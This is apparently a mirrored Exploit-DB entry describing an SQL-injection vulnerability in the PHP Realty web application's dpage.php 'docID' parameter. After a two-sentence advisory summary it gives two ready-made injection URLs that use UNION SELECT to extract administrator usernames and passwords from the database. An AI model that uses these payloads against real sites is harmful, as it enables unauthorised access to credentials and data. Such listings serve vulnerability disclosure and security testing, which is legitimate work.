exploit-db-mirror/platforms/php/webapps/32241.txt
Offensive Security 97f8c52d74 Updated 03_15_2014
2014-03-15 04:29:27 +00:00

8 lines
No EOL
611 B
Text
Executable file

source: http://www.securityfocus.com/bid/30678/info
PHP Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin--
http://www.example.com/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin--